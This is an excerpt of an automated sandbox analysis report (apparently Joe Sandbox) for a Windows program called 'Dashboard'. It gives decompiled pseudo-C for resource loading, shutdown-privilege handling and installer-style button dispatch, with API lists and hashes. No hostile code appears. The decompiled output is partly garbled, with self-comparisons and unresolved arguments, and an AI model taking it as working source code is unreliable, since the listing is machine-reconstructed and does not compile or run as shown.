                                                                                                                    • Instruction ID: 7c2561d37f4f8e37f3ba00928a2c0b310663c91fd433351266e3a9b238308abd
                                                                                                                    • Opcode Fuzzy Hash: 70f33ab9d729608102f05b2e7a97b5d5e3e1e5541cdeeb8c49c9180d0241caed
                                                                                                                    • Instruction Fuzzy Hash: 94F0FC31F0066C9FE723DBB995156EF77E4BB04B41F00819EEAC2E7280D675A90487D0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E010047FF(struct HINSTANCE__* _a4, struct HRSRC__* _a8, signed int _a12) {
                                                                                                                    				void* _t9;
                                                                                                                    				signed int _t11;
                                                                                                                    				void* _t13;
                                                                                                                    				signed int _t17;
                                                                                                                    				signed int _t20;
                                                                                                                    
                                                                                                                    				_t9 = LoadResource(_a4, _a8);
                                                                                                                    				if(_t9 != 0) {
                                                                                                                    					_t20 = LockResource(_t9);
                                                                                                                    					if(_t20 == 0) {
                                                                                                                    						L6:
                                                                                                                    						_t11 = 0;
                                                                                                                    						L8:
                                                                                                                    						return _t11;
                                                                                                                    					}
                                                                                                                    					_t13 = SizeofResource(_a4, _a8) + _t20;
                                                                                                                    					_t17 = _a12 & 0x0000000f;
                                                                                                                    					if(_t17 <= 0) {
                                                                                                                    						L5:
                                                                                                                    						if(_t20 < _t13) {
                                                                                                                    							asm("sbb eax, eax");
                                                                                                                    							_t11 =  ~( *_t20) & _t20;
                                                                                                                    							goto L8;
                                                                                                                    						}
                                                                                                                    						goto L6;
                                                                                                                    					}
                                                                                                                    					while(_t20 < _t13) {
                                                                                                                    						_t17 = _t17 - 1;
                                                                                                                    						_t20 = _t20 + 2 + ( *_t20 & 0x0000ffff) * 2;
                                                                                                                    						if(_t17 != 0) {
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						goto L5;
                                                                                                                    					}
                                                                                                                    					goto L6;
                                                                                                                    				}
                                                                                                                    				return _t9;
                                                                                                                    			}








                                                                                                                    0x0100480a
                                                                                                                    0x01004812
                                                                                                                    0x0100481c
                                                                                                                    0x01004820
                                                                                                                    0x0100484a
                                                                                                                    0x0100484a
                                                                                                                    0x01004858
                                                                                                                    0x00000000
                                                                                                                    0x01004858
                                                                                                                    0x01004831
                                                                                                                    0x01004833
                                                                                                                    0x01004836
                                                                                                                    0x01004846
                                                                                                                    0x01004848
                                                                                                                    0x01004854
                                                                                                                    0x01004856
                                                                                                                    0x00000000
                                                                                                                    0x01004856
                                                                                                                    0x00000000
                                                                                                                    0x01004848
                                                                                                                    0x01004838
                                                                                                                    0x0100483c
                                                                                                                    0x01004840
                                                                                                                    0x01004844
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01004844
                                                                                                                    0x00000000
                                                                                                                    0x01004838
                                                                                                                    0x0100485a

                                                                                                                    APIs
                                                                                                                    • LoadResource.KERNEL32(?,?), ref: 0100480A
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 01004816
                                                                                                                    • SizeofResource.KERNEL32(?,?), ref: 01004828
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2853612939-0
                                                                                                                    • Opcode ID: d300b1ff273da81805bbf4274dc51f555af305744bdd5595e51e1baae54334aa
                                                                                                                    • Instruction ID: 1b9bcc1dda9c9307f46271213d178df62426f5561de06aa43ac8de7883e5bbcd
                                                                                                                    • Opcode Fuzzy Hash: d300b1ff273da81805bbf4274dc51f555af305744bdd5595e51e1baae54334aa
                                                                                                                    • Instruction Fuzzy Hash: 0AF0CD36600166A7DF372F28DC049EEBBD5EB447A1B044829FBE1D7140E635DA20DB98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E0100CCC8(void* __eflags, int _a4, long _a8) {
                                                                                                                    				void* _t3;
                                                                                                                    				signed int _t4;
                                                                                                                    
                                                                                                                    				_t3 = E0100CC59();
                                                                                                                    				if(_t3 != 0) {
                                                                                                                    					_t4 = ExitWindowsEx(_a4, _a8);
                                                                                                                    					asm("sbb eax, eax");
                                                                                                                    					return  ~( ~_t4);
                                                                                                                    				}
                                                                                                                    				return _t3;
                                                                                                                    			}





                                                                                                                    0x0100cccd
                                                                                                                    0x0100ccd4
                                                                                                                    0x0100ccdc
                                                                                                                    0x0100cce4
                                                                                                                    0x00000000
                                                                                                                    0x0100cce6
                                                                                                                    0x0100cce9

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0100CC59: GetCurrentProcess.KERNEL32(00000028,?), ref: 0100CC6A
                                                                                                                      • Part of subcall function 0100CC59: OpenProcessToken.ADVAPI32(00000000), ref: 0100CC71
                                                                                                                      • Part of subcall function 0100CC59: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0100CC85
                                                                                                                      • Part of subcall function 0100CC59: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0100CCA4
                                                                                                                      • Part of subcall function 0100CC59: GetLastError.KERNEL32 ref: 0100CCAA
                                                                                                                      • Part of subcall function 0100CC59: CloseHandle.KERNEL32(?), ref: 0100CCB8
                                                                                                                    • ExitWindowsEx.USER32 ref: 0100CCDC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProcessToken$AdjustCloseCurrentErrorExitHandleLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3672536310-0
                                                                                                                    • Opcode ID: 2dc45d28cb94792324e4564fa534f6c9f771541fe6c1a1f6461dc5fb7b7ddf34
                                                                                                                    • Instruction ID: ac00cf5b8632513a42fe9c9415866d1b4a1c37558d9d079e883b4ee4856cca59
                                                                                                                    • Opcode Fuzzy Hash: 2dc45d28cb94792324e4564fa534f6c9f771541fe6c1a1f6461dc5fb7b7ddf34
                                                                                                                    • Instruction Fuzzy Hash: A2C0803118410F6F7F522F75DD04D663F59BB61351F004251F949C50D0DE32D425D750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E01011FBA(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				void* _t74;
                                                                                                                    				short* _t75;
                                                                                                                    				intOrPtr* _t76;
                                                                                                                    				void* _t78;
                                                                                                                    				struct HWND__* _t79;
                                                                                                                    				void* _t80;
                                                                                                                    				void* _t81;
                                                                                                                    				void* _t82;
                                                                                                                    				void* _t83;
                                                                                                                    				void* _t84;
                                                                                                                    				void* _t85;
                                                                                                                    				void* _t86;
                                                                                                                    				void* _t87;
                                                                                                                    				short* _t90;
                                                                                                                    				intOrPtr* _t91;
                                                                                                                    				short* _t94;
                                                                                                                    				intOrPtr* _t95;
                                                                                                                    				intOrPtr* _t98;
                                                                                                                    				short* _t105;
                                                                                                                    				short* _t107;
                                                                                                                    				signed int _t156;
                                                                                                                    				signed int _t158;
                                                                                                                    				void* _t162;
                                                                                                                    				intOrPtr* _t163;
                                                                                                                    				intOrPtr* _t164;
                                                                                                                    				void* _t165;
                                                                                                                    
                                                                                                                    				_t154 = __edx;
                                                                                                                    				_push(0);
                                                                                                                    				E0100880F(E0101645C, __ebx, __edi, __esi);
                                                                                                                    				_t162 = __ecx;
                                                                                                                    				_t72 =  *(__ecx + 0x34);
                                                                                                                    				if( *(__ecx + 0x34) == 0) {
                                                                                                                    					L73:
                                                                                                                    					return E010088FB(_t72);
                                                                                                                    				}
                                                                                                                    				_t156 =  *(_t165 + 0xc);
                                                                                                                    				if(_t156 == 0 ||  *((intOrPtr*)(_t165 + 8)) == 0 ||  *((intOrPtr*)(_t156 + 0xc)) != 2 ||  *((char*)(_t156 + 8)) != 0) {
                                                                                                                    					goto L73;
                                                                                                                    				} else {
                                                                                                                    					_t72 =  *(_t156 + 4);
                                                                                                                    					if(_t72 !=  *__imp__?Click@Button@DirectUI@@2PAEA) {
                                                                                                                    						__eflags =  *__imp__?Navigate@Hyperlink@DirectUI@@2PAEA - _t72;
                                                                                                                    						if( *__imp__?Navigate@Hyperlink@DirectUI@@2PAEA == _t72) {
                                                                                                                    							_t72 = E0100CE27(_t156);
                                                                                                                    						}
                                                                                                                    						goto L73;
                                                                                                                    					}
                                                                                                                    					_t74 = E0100C81B();
                                                                                                                    					__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"FLWCloseBtn");
                                                                                                                    					if(_t74 == _t74) {
                                                                                                                    						L66:
                                                                                                                    						_t75 =  *0x101a004; // 0x101a004
                                                                                                                    						__eflags = _t75 - 0x101a004;
                                                                                                                    						if(_t75 == 0x101a004) {
                                                                                                                    							L70:
                                                                                                                    							_t76 = _t162 - 0x28;
                                                                                                                    							_t72 =  *((intOrPtr*)( *_t76 + 0x1c))(_t76);
                                                                                                                    							goto L73;
                                                                                                                    						}
                                                                                                                    						__eflags = _t75[0xe] & 0x00000008;
                                                                                                                    						if((_t75[0xe] & 0x00000008) == 0) {
                                                                                                                    							goto L70;
                                                                                                                    						}
                                                                                                                    						_push(0x1002308);
                                                                                                                    						_push(0x1a);
                                                                                                                    						L69:
                                                                                                                    						_t65 =  &(_t75[0xa]); // 0x65637845
                                                                                                                    						_push( *_t65);
                                                                                                                    						_t66 =  &(_t75[8]); // 0x6c744143
                                                                                                                    						_push( *_t66);
                                                                                                                    						E010049DE(_t75);
                                                                                                                    						goto L70;
                                                                                                                    					}
                                                                                                                    					_t78 = E0100C81B();
                                                                                                                    					__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idClose");
                                                                                                                    					if(_t78 == _t78) {
                                                                                                                    						goto L66;
                                                                                                                    					}
                                                                                                                    					_t79 = E0100C81B();
                                                                                                                    					__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"FLWMinBtn");
                                                                                                                    					if(_t79 != _t79) {
                                                                                                                    						_t80 = E0100C81B();
                                                                                                                    						__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idCompletionClose");
                                                                                                                    						__eflags = _t80 - _t80;
                                                                                                                    						if(_t80 != _t80) {
                                                                                                                    							_t81 = E0100C81B();
                                                                                                                    							__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idCancel");
                                                                                                                    							__eflags = _t81 - _t81;
                                                                                                                    							if(_t81 != _t81) {
                                                                                                                    								_t82 = E0100C81B();
                                                                                                                    								_t115 = _t82;
                                                                                                                    								__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idResume");
                                                                                                                    								__eflags = _t82 - _t82;
                                                                                                                    								if(_t82 != _t82) {
                                                                                                                    									_t83 = E0100C81B();
                                                                                                                    									_t116 = _t83;
                                                                                                                    									__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idIgnore");
                                                                                                                    									__eflags = _t83 - _t83;
                                                                                                                    									if(_t83 != _t83) {
                                                                                                                    										_t84 = E0100C81B();
                                                                                                                    										_t117 = _t84;
                                                                                                                    										__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idRetry");
                                                                                                                    										__eflags = _t84 - _t84;
                                                                                                                    										if(_t84 != _t84) {
                                                                                                                    											_t85 = E0100C81B();
                                                                                                                    											_t115 = _t85;
                                                                                                                    											__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idConfirmedCancel");
                                                                                                                    											__eflags = _t85 - _t85;
                                                                                                                    											if(_t85 != _t85) {
                                                                                                                    												_t86 = E0100C81B();
                                                                                                                    												_t118 = _t86;
                                                                                                                    												__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idInstall");
                                                                                                                    												__eflags = _t86 - _t86;
                                                                                                                    												if(_t86 != _t86) {
                                                                                                                    													_t87 = E0100C81B();
                                                                                                                    													__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idRestartClose");
                                                                                                                    													__eflags = _t87 - _t87;
                                                                                                                    													if(_t87 != _t87) {
                                                                                                                    														_t72 = E0100C81B();
                                                                                                                    														__imp__?StrToID@DirectUI@@YGGPB_W@Z(L"idProductName");
                                                                                                                    														__eflags = _t72 - _t72;
                                                                                                                    														if(_t72 == _t72) {
                                                                                                                    															 *(_t165 + 0xc) =  *(_t165 + 0xc) & 0x00000000;
                                                                                                                    															 *(_t165 - 4) =  *(_t165 - 4) & 0x00000000;
                                                                                                                    															_t72 = E0100C7F6(E0100C768(_t165 + 0xc));
                                                                                                                    															__eflags = _t72;
                                                                                                                    															if(_t72 != 0) {
                                                                                                                    																_t72 = CompareStringW(0x7f, 1, _t72, 0xffffffff, L"ProductNameTextInstalled", 0xffffffff);
                                                                                                                    																__eflags = _t72 - 2;
                                                                                                                    																if(_t72 == 2) {
                                                                                                                    																	_t72 = E0100C784( *_t156);
                                                                                                                    																	__eflags = _t72;
                                                                                                                    																	if(_t72 != 0) {
                                                                                                                    																		_t163 =  *((intOrPtr*)(_t162 + 0x34));
                                                                                                                    																		_t158 =  *_t163 + 0x20;
                                                                                                                    																		__eflags = _t158;
                                                                                                                    																		_t72 =  *_t158(_t163, E0100C81B());
                                                                                                                    																	}
                                                                                                                    																}
                                                                                                                    															}
                                                                                                                    															_t140 =  *(_t165 + 0xc);
                                                                                                                    															 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
                                                                                                                    															__eflags =  *(_t165 + 0xc);
                                                                                                                    															if( *(_t165 + 0xc) != 0) {
                                                                                                                    																_t72 = E0100C734(_t140);
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    													} else {
                                                                                                                    														_t90 =  *0x101a004; // 0x101a004
                                                                                                                    														__eflags = _t90 - 0x101a004;
                                                                                                                    														if(__eflags != 0) {
                                                                                                                    															__eflags = _t90[0xe] & 0x00000008;
                                                                                                                    															if(__eflags != 0) {
                                                                                                                    																_t49 =  &(_t90[0xa]); // 0x65637845
                                                                                                                    																_t50 =  &(_t90[8]); // 0x6c744143
                                                                                                                    																E010049DE(_t90,  *_t50,  *_t49, 0x20, 0x1002308);
                                                                                                                    															}
                                                                                                                    														}
                                                                                                                    														_t91 = _t162 - 0x28;
                                                                                                                    														 *((intOrPtr*)( *_t91 + 0x1c))(_t91);
                                                                                                                    														_t72 = E0100CCC8(__eflags, 2, 0x40002);
                                                                                                                    													}
                                                                                                                    													goto L73;
                                                                                                                    												}
                                                                                                                    												_t72 =  *0x101a004; // 0x101a004
                                                                                                                    												__eflags = _t72 - 0x101a004;
                                                                                                                    												if(_t72 != 0x101a004) {
                                                                                                                    													__eflags = _t72[0xe] & 0x00000008;
                                                                                                                    													if((_t72[0xe] & 0x00000008) != 0) {
                                                                                                                    														_t41 =  &(_t72[0xa]); // 0x65637845
                                                                                                                    														_t42 =  &(_t72[8]); // 0x6c744143
                                                                                                                    														_t72 = E010049DE(_t72,  *_t42,  *_t41, 0x1f, 0x1002308);
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    												__eflags =  *(_t162 + 0x18) - 1;
                                                                                                                    												if(__eflags != 0) {
                                                                                                                    													goto L73;
                                                                                                                    												} else {
                                                                                                                    													_t79 = E01011292(_t118, _t162 - 0x28, _t154, _t156, _t162, __eflags);
                                                                                                                    													_push(0);
                                                                                                                    													_push(0);
                                                                                                                    													_push(0xbd1);
                                                                                                                    													goto L53;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    											_t94 =  *0x101a004; // 0x101a004
                                                                                                                    											__eflags = _t94 - 0x101a004;
                                                                                                                    											if(_t94 != 0x101a004) {
                                                                                                                    												__eflags = _t94[0xe] & 0x00000008;
                                                                                                                    												if((_t94[0xe] & 0x00000008) != 0) {
                                                                                                                    													_t29 =  &(_t94[0xa]); // 0x65637845
                                                                                                                    													_t30 =  &(_t94[8]); // 0x6c744143
                                                                                                                    													_t94 = E010049DE(_t94,  *_t30,  *_t29, 0x1e, 0x1002308);
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    											__eflags =  *(_t162 + 0x18) - 6;
                                                                                                                    											if(__eflags == 0) {
                                                                                                                    												E0100CF42(_t94, _t162 - 0x28, L"idFIUListScrollviwer", 0);
                                                                                                                    												_t98 =  *((intOrPtr*)(_t162 + 0x34));
                                                                                                                    												 *((intOrPtr*)( *_t98 + 0x2c))(_t98, 2);
                                                                                                                    											}
                                                                                                                    											_t95 =  *((intOrPtr*)(_t162 + 0x34));
                                                                                                                    											 *((intOrPtr*)( *_t95 + 0x18))(_t95);
                                                                                                                    											_push(8);
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    										E0100CF42(_t84, _t162 - 0x28, L"idFIUListScrollviwer", 0);
                                                                                                                    										_push(3);
                                                                                                                    										E010119FB(_t117, _t162 - 0x28, __edx, _t162 - 0x28, _t162, __eflags);
                                                                                                                    										_push(4);
                                                                                                                    										L38:
                                                                                                                    										_t164 =  *((intOrPtr*)(_t162 + 0x34));
                                                                                                                    										_t72 =  *((intOrPtr*)( *_t164 + 0x2c))(_t164);
                                                                                                                    										goto L73;
                                                                                                                    									}
                                                                                                                    									E0100CF42(_t83, _t162 - 0x28, L"idFIUListScrollviwer", 0);
                                                                                                                    									_push(3);
                                                                                                                    									E010119FB(_t116, _t162 - 0x28, __edx, _t162 - 0x28, _t162, __eflags);
                                                                                                                    									_push(5);
                                                                                                                    									goto L38;
                                                                                                                    								}
                                                                                                                    								_t105 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t105 - 0x101a004;
                                                                                                                    								if(_t105 != 0x101a004) {
                                                                                                                    									__eflags = _t105[0xe] & 0x00000008;
                                                                                                                    									if((_t105[0xe] & 0x00000008) != 0) {
                                                                                                                    										_t19 =  &(_t105[0xa]); // 0x65637845
                                                                                                                    										_t20 =  &(_t105[8]); // 0x6c744143
                                                                                                                    										E010049DE(_t105,  *_t20,  *_t19, 0x1d, 0x1002308);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								_t72 =  *(_t162 + 0x18);
                                                                                                                    								__eflags = _t72 - 2;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									__eflags = _t72 - 4;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										__eflags = _t72 - 6;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											goto L73;
                                                                                                                    										}
                                                                                                                    										_push(5);
                                                                                                                    										goto L46;
                                                                                                                    									}
                                                                                                                    									_push(3);
                                                                                                                    									goto L46;
                                                                                                                    								}
                                                                                                                    								_push(1);
                                                                                                                    								goto L46;
                                                                                                                    							} else {
                                                                                                                    								_t107 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t107 - 0x101a004;
                                                                                                                    								if(_t107 != 0x101a004) {
                                                                                                                    									__eflags = _t107[0xe] & 0x00000008;
                                                                                                                    									if((_t107[0xe] & 0x00000008) != 0) {
                                                                                                                    										_t13 =  &(_t107[0xa]); // 0x65637845
                                                                                                                    										_t14 =  &(_t107[8]); // 0x6c744143
                                                                                                                    										E010049DE(_t107,  *_t14,  *_t13, 0x1c, 0x1002308);
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								_t72 =  *(_t162 + 0x18);
                                                                                                                    								__eflags = _t72 - 1;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									__eflags = _t72 - 3;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										__eflags = _t72 - 5;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											goto L73;
                                                                                                                    										} else {
                                                                                                                    											_push(6);
                                                                                                                    											goto L46;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										_push(4);
                                                                                                                    										goto L46;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									_push(2);
                                                                                                                    									L46:
                                                                                                                    									_t72 = E010119FB(_t115, _t162 - 0x28, _t154, _t156, _t162, __eflags);
                                                                                                                    									goto L73;
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						_t75 =  *0x101a004; // 0x101a004
                                                                                                                    						__eflags = _t75 - 0x101a004;
                                                                                                                    						if(_t75 == 0x101a004) {
                                                                                                                    							goto L70;
                                                                                                                    						}
                                                                                                                    						__eflags = _t75[0xe] & 0x00000008;
                                                                                                                    						if((_t75[0xe] & 0x00000008) == 0) {
                                                                                                                    							goto L70;
                                                                                                                    						} else {
                                                                                                                    							_push(0x1002308);
                                                                                                                    							_push(0x1b);
                                                                                                                    							goto L69;
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						_push(0);
                                                                                                                    						_push(0xf020);
                                                                                                                    						_push(0x112);
                                                                                                                    						L53:
                                                                                                                    						__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    						_t72 = PostMessageW(_t79, ??, ??, ??);
                                                                                                                    						goto L73;
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}





























                                                                                                                    0x01011fba
                                                                                                                    0x01011fba
                                                                                                                    0x01011fc1
                                                                                                                    0x01011fc6
                                                                                                                    0x01011fc8
                                                                                                                    0x01011fcd
                                                                                                                    0x01012403
                                                                                                                    0x01012408
                                                                                                                    0x01012408
                                                                                                                    0x01011fd3
                                                                                                                    0x01011fd8
                                                                                                                    0x00000000
                                                                                                                    0x01011ffc
                                                                                                                    0x01011ffc
                                                                                                                    0x01012007
                                                                                                                    0x010123f6
                                                                                                                    0x010123f8
                                                                                                                    0x010123fe
                                                                                                                    0x010123fe
                                                                                                                    0x00000000
                                                                                                                    0x010123f8
                                                                                                                    0x0101200f
                                                                                                                    0x0101201c
                                                                                                                    0x01012025
                                                                                                                    0x010123c1
                                                                                                                    0x010123c1
                                                                                                                    0x010123c6
                                                                                                                    0x010123cb
                                                                                                                    0x010123e5
                                                                                                                    0x010123e5
                                                                                                                    0x010123eb
                                                                                                                    0x00000000
                                                                                                                    0x010123eb
                                                                                                                    0x010123cd
                                                                                                                    0x010123d1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010123d3
                                                                                                                    0x010123d8
                                                                                                                    0x010123da
                                                                                                                    0x010123da
                                                                                                                    0x010123da
                                                                                                                    0x010123dd
                                                                                                                    0x010123dd
                                                                                                                    0x010123e0
                                                                                                                    0x00000000
                                                                                                                    0x010123e0
                                                                                                                    0x0101202d
                                                                                                                    0x0101203a
                                                                                                                    0x01012043
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101204b
                                                                                                                    0x01012058
                                                                                                                    0x01012061
                                                                                                                    0x01012076
                                                                                                                    0x01012083
                                                                                                                    0x01012089
                                                                                                                    0x0101208c
                                                                                                                    0x010120b6
                                                                                                                    0x010120c3
                                                                                                                    0x010120c9
                                                                                                                    0x010120cc
                                                                                                                    0x0101211f
                                                                                                                    0x01012129
                                                                                                                    0x0101212c
                                                                                                                    0x01012132
                                                                                                                    0x01012135
                                                                                                                    0x01012188
                                                                                                                    0x01012192
                                                                                                                    0x01012195
                                                                                                                    0x0101219b
                                                                                                                    0x0101219e
                                                                                                                    0x010121c0
                                                                                                                    0x010121ca
                                                                                                                    0x010121cd
                                                                                                                    0x010121d3
                                                                                                                    0x010121d6
                                                                                                                    0x01012204
                                                                                                                    0x0101220e
                                                                                                                    0x01012211
                                                                                                                    0x01012217
                                                                                                                    0x0101221a
                                                                                                                    0x0101227a
                                                                                                                    0x01012284
                                                                                                                    0x01012287
                                                                                                                    0x0101228d
                                                                                                                    0x01012290
                                                                                                                    0x010122e8
                                                                                                                    0x010122f5
                                                                                                                    0x010122fb
                                                                                                                    0x010122fe
                                                                                                                    0x01012340
                                                                                                                    0x0101234d
                                                                                                                    0x01012353
                                                                                                                    0x01012356
                                                                                                                    0x0101235c
                                                                                                                    0x01012360
                                                                                                                    0x0101236f
                                                                                                                    0x01012374
                                                                                                                    0x01012376
                                                                                                                    0x01012386
                                                                                                                    0x0101238c
                                                                                                                    0x0101238f
                                                                                                                    0x01012393
                                                                                                                    0x01012398
                                                                                                                    0x0101239a
                                                                                                                    0x0101239c
                                                                                                                    0x010123a3
                                                                                                                    0x010123a3
                                                                                                                    0x010123ad
                                                                                                                    0x010123ad
                                                                                                                    0x0101239a
                                                                                                                    0x0101238f
                                                                                                                    0x010123af
                                                                                                                    0x010123b2
                                                                                                                    0x010123b6
                                                                                                                    0x010123b8
                                                                                                                    0x010123ba
                                                                                                                    0x010123ba
                                                                                                                    0x010123b8
                                                                                                                    0x01012300
                                                                                                                    0x01012300
                                                                                                                    0x01012305
                                                                                                                    0x0101230a
                                                                                                                    0x0101230c
                                                                                                                    0x01012310
                                                                                                                    0x01012319
                                                                                                                    0x0101231c
                                                                                                                    0x0101231f
                                                                                                                    0x0101231f
                                                                                                                    0x01012310
                                                                                                                    0x01012324
                                                                                                                    0x0101232a
                                                                                                                    0x01012334
                                                                                                                    0x01012334
                                                                                                                    0x00000000
                                                                                                                    0x010122fe
                                                                                                                    0x01012292
                                                                                                                    0x01012297
                                                                                                                    0x0101229c
                                                                                                                    0x0101229e
                                                                                                                    0x010122a2
                                                                                                                    0x010122ab
                                                                                                                    0x010122ae
                                                                                                                    0x010122b1
                                                                                                                    0x010122b1
                                                                                                                    0x010122a2
                                                                                                                    0x010122b6
                                                                                                                    0x010122ba
                                                                                                                    0x00000000
                                                                                                                    0x010122c0
                                                                                                                    0x010122c3
                                                                                                                    0x010122c8
                                                                                                                    0x010122ca
                                                                                                                    0x010122cc
                                                                                                                    0x00000000
                                                                                                                    0x010122cc
                                                                                                                    0x010122ba
                                                                                                                    0x0101221c
                                                                                                                    0x01012221
                                                                                                                    0x01012226
                                                                                                                    0x01012228
                                                                                                                    0x0101222c
                                                                                                                    0x01012235
                                                                                                                    0x01012238
                                                                                                                    0x0101223b
                                                                                                                    0x0101223b
                                                                                                                    0x0101222c
                                                                                                                    0x01012240
                                                                                                                    0x01012244
                                                                                                                    0x01012250
                                                                                                                    0x01012255
                                                                                                                    0x0101225d
                                                                                                                    0x0101225d
                                                                                                                    0x01012260
                                                                                                                    0x01012266
                                                                                                                    0x01012269
                                                                                                                    0x00000000
                                                                                                                    0x01012269
                                                                                                                    0x010121e4
                                                                                                                    0x010121e9
                                                                                                                    0x010121ed
                                                                                                                    0x010121f2
                                                                                                                    0x010121f4
                                                                                                                    0x010121f4
                                                                                                                    0x010121fa
                                                                                                                    0x00000000
                                                                                                                    0x010121fa
                                                                                                                    0x010121ac
                                                                                                                    0x010121b1
                                                                                                                    0x010121b5
                                                                                                                    0x010121ba
                                                                                                                    0x00000000
                                                                                                                    0x010121ba
                                                                                                                    0x01012137
                                                                                                                    0x0101213c
                                                                                                                    0x01012141
                                                                                                                    0x01012143
                                                                                                                    0x01012147
                                                                                                                    0x01012150
                                                                                                                    0x01012153
                                                                                                                    0x01012156
                                                                                                                    0x01012156
                                                                                                                    0x01012147
                                                                                                                    0x0101215b
                                                                                                                    0x0101215e
                                                                                                                    0x01012161
                                                                                                                    0x0101216a
                                                                                                                    0x0101216d
                                                                                                                    0x01012176
                                                                                                                    0x01012179
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101217f
                                                                                                                    0x00000000
                                                                                                                    0x0101217f
                                                                                                                    0x0101216f
                                                                                                                    0x00000000
                                                                                                                    0x0101216f
                                                                                                                    0x01012163
                                                                                                                    0x00000000
                                                                                                                    0x010120ce
                                                                                                                    0x010120ce
                                                                                                                    0x010120d3
                                                                                                                    0x010120d8
                                                                                                                    0x010120da
                                                                                                                    0x010120de
                                                                                                                    0x010120e7
                                                                                                                    0x010120ea
                                                                                                                    0x010120ed
                                                                                                                    0x010120ed
                                                                                                                    0x010120de
                                                                                                                    0x010120f2
                                                                                                                    0x010120f5
                                                                                                                    0x010120f8
                                                                                                                    0x01012101
                                                                                                                    0x01012104
                                                                                                                    0x0101210d
                                                                                                                    0x01012110
                                                                                                                    0x00000000
                                                                                                                    0x01012116
                                                                                                                    0x01012116
                                                                                                                    0x00000000
                                                                                                                    0x01012116
                                                                                                                    0x01012106
                                                                                                                    0x01012106
                                                                                                                    0x00000000
                                                                                                                    0x01012106
                                                                                                                    0x010120fa
                                                                                                                    0x010120fa
                                                                                                                    0x0101226b
                                                                                                                    0x0101226e
                                                                                                                    0x00000000
                                                                                                                    0x0101226e
                                                                                                                    0x010120f8
                                                                                                                    0x010120cc
                                                                                                                    0x0101208e
                                                                                                                    0x01012093
                                                                                                                    0x01012098
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101209e
